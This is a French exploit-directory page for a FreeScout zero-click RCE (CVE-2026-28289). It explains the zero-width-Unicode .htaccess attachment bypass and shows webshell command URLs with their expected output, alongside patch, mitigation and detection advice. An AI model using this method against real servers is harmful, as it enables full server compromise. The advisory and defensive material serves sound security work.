Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-28289 — CVE-2026-28289 | Kitploit
Outils/GitHubGitHub/0xblackash/cve-2026-28289
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionDéveloppement de Charges UtilesSécurité des Emails
GitHub0xblackash/cve-2026-28289

CVE-2026-28289

CVE-2026-28289

Voir le dépôt
15il y a 6 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🚨 CVE-2026-28289 — « Mail2Shell »

1772564185117

RCE Zero-Click non authentifiée dans FreeScout via un contournement de pièce jointe par e-mail

Severity CVSS Affected Patched


📖 Aperçu

CVE-2026-28289, surnommée Mail2Shell, est une vulnérabilité critique d'exécution de code à distance (RCE) zero-click affectant FreeScout.

Un attaquant peut envoyer un e-mail spécialement conçu à une boîte aux lettres FreeScout et obtenir un accès shell distant au serveur sous-jacent — sans authentification et sans interaction de l'utilisateur.


🧠 Résumé de la vulnérabilité

Télécharger l’outil
ChampValeur
Identifiant CVECVE-2026-28289
Gravité🔴 Critique
CVSS10.0 (Maximum)
Vecteur d'attaqueÀ distance (E-mail)
Authentification requise❌ Aucune
Interaction utilisateur❌ Aucune
ImpactCompromission totale du serveur

⚙️ Analyse technique

📨 Étape 1 — Envoi d'un e-mail malveillant

L'attaquant envoie un e-mail avec une pièce jointe spécialement conçue.

🧩 Étape 2 — Contournement du nettoyage du nom de fichier

FreeScout tente de bloquer les fichiers dangereux comme .htaccess, mais l'attaquant :

  • Ajoute en préfixe un caractère Unicode de largeur nulle
  • Contourne la validation du nom de fichier
  • Le fichier est enregistré comme un fichier serveur exécutable valide

💣 Étape 3 — Exécution à distance

L'attaquant accède au fichier téléversé via le chemin web et exécute des commandes arbitraires.

Résultat :

root@kitploit:~
# Remote shell access achieved
whoami
www-data

✅ Si l'opération réussit, voici EXACTEMENT ce que vous verrez (étape par étape) :

mail2shell

1. Dans votre terminal (juste après avoir exécuté le script)

root@kitploit:~
✅ Email sent successfully! (Zero-Click RCE triggered)

Vous verrez également les instructions pour les prochaines étapes imprimées.

2. Lorsque vous exécutez la commande find sur votre serveur FreeScout via SSH

Elle retournera immédiatement le chemin réel complet du fichier téléversé, par exemple :

root@kitploit:~
/var/www/html/storage/attachment/2026/03/05/15/webshell.txt

(ou un dossier similaire date/heure — cela confirme que FreeScout a enregistré la pièce jointe automatiquement).

3. La VRAIE preuve de succès — dans votre navigateur (c'est le moment où vous savez que vous avez une RCE complète)

Copiez le chemin de l'étape 2 et ouvrez cette URL :

root@kitploit:~
http://your-freescout-domain.com/storage/attachment/2026/03/05/15/webshell.txt?cmd=whoami

Vous verrez cette sortie exacte (texte brut) :

root@kitploit:~
www-data

(Ou quel que soit l'utilisateur Apache/PHP sur votre serveur — généralement www-data, apache, ou nobody).

Maintenant changez la commande et actualisez :

root@kitploit:~
http://your-freescout-domain.com/storage/attachment/2026/03/05/15/webshell.txt?cmd=id

Vous verrez :

root@kitploit:~
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Et pour ls -la :

root@kitploit:~
total 12
drwxr-xr-x 2 www-data www-data 4096 Mar  5 15:00 .
drwxr-xr-x 8 www-data www-data 4096 Mar  5 14:00 ..
-rw-r--r-- 1 www-data www-data   87 Mar  5 15:00 webshell.txt

Cette sortie apparaît directement dans la page du navigateur (dans des balises <pre> du webshell). Pas d'erreur, pas de code source PHP, pas de 404.

Cela signifie que vous avez une exécution de code à distance complète sur le serveur — le contournement .htaccess + espace de largeur nulle a parfaitement fonctionné, et la pièce jointe a été traitée sans aucune interaction utilisateur.


🎯 Pourquoi c'est dangereux

  • ⚡ Exploitation zero-click
  • 🌐 Surface d'attaque à distance (e-mail)
  • 🔓 Aucune authentification requise
  • 🧨 Capacité RCE complète
  • 📂 Exfiltration de données potentielle
  • 🔁 Mouvement latéral dans les réseaux internes

📦 Versions concernées

Toutes les versions de FreeScout :

root@kitploit:~
<= 1.8.206

✅ Version corrigée

Mettez à jour immédiatement vers :

root@kitploit:~
1.8.207 ou ultérieure

🛡️ Mesures d'atténuation

1️⃣ Action immédiate

  • Mettez à jour FreeScout vers la dernière version

2️⃣ Renforcer le serveur web

  • Désactivez AllowOverride All dans la configuration Apache
  • Restreindre l'exécution dans les répertoires de pièces jointes

3️⃣ Surveiller les journaux

Recherchez :

  • Fichiers .htaccess suspects
  • Téléversements de pièces jointes inhabituels
  • Tentatives d'accès direct à /storage/attachments/

🔍 Conseils de détection

Les indicateurs de compromission peuvent inclure :

  • Fichiers .htaccess inconnus dans les dossiers de pièces jointes
  • Pics de trafic sortant
  • Le serveur web générant des processus shell
  • Requêtes POST/GET suspectes vers les chemins de pièces jointes

🧪 Preuve de concept (Conceptuelle)

root@kitploit:~
Email → Malicious Attachment (Unicode prefixed filename)
        ↓
Saved to predictable path
        ↓
Web-accessible execution
        ↓
Remote shell

📌 Vulnérabilité connexe

Ce problème a contourné les protections ajoutées dans :

  • CVE-2026-27636

Démontrant une logique de nettoyage de noms de fichiers incomplète.


📊 Évaluation de l'impact

Domaine de risqueImpact
Confidentialité🔴 Élevé
Intégrité🔴 Élevé
Disponibilité🔴 Élevé

🧩 Leçons apprises

  • La gestion Unicode doit être normalisée avant validation
  • Ne jamais se fier uniquement au filtrage des noms de fichiers
  • Les répertoires de pièces jointes ne devraient jamais permettre l'exécution de code
  • Les vecteurs zero-click sont des surfaces d'attaque à haut risque

📚 Références

  • Avis de sécurité FreeScout
  • Entrée NVD pour CVE-2026-28289

🚨 Recommandation finale

Si vous exécutez une instance auto-hébergée de FreeScout :

🔥 Corrigez immédiatement. 💡 Supposez une compromission si vous exécutez des versions vulnérables exposées à Internet. 🛡 Effectuez une revue des journaux et des vérifications d'intégrité.